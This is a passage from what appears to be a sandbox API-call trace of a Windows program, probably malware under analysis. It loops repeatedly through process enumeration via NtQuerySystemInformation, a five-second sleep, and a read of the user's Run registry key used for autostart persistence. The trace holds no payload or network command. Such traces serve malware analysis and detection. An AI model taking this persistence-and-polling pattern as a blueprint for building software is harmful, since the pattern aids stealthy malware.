RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.275] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.275] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.275] NtClose (Handle=0x154) returned 0x0 [0180.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.290] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.290] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.290] NtClose (Handle=0x154) returned 0x0 [0180.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.297] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.305] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.305] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.305] NtClose (Handle=0x154) returned 0x0 [0180.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.310] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.321] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.321] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.321] NtClose (Handle=0x154) returned 0x0 [0180.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.325] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.336] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.337] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.337] NtClose (Handle=0x154) returned 0x0 [0180.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.341] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.352] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.352] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.352] NtClose (Handle=0x154) returned 0x0 [0180.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.357] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.369] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.369] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.369] NtClose (Handle=0x154) returned 0x0 [0180.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.373] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.383] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.384] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.384] NtClose (Handle=0x154) returned 0x0 [0180.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.389] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.399] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.399] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.399] NtClose (Handle=0x154) returned 0x0 [0180.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.404] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.414] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.414] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.415] NtClose (Handle=0x154) returned 0x0 [0180.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.418] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.430] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.430] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.430] NtClose (Handle=0x154) returned 0x0 [0180.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.446] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.446] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.446] NtClose (Handle=0x154) returned 0x0 [0180.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.451] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.461] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.461] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.461] NtClose (Handle=0x154) returned 0x0 [0180.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.465] NtFreeVirtualMemory 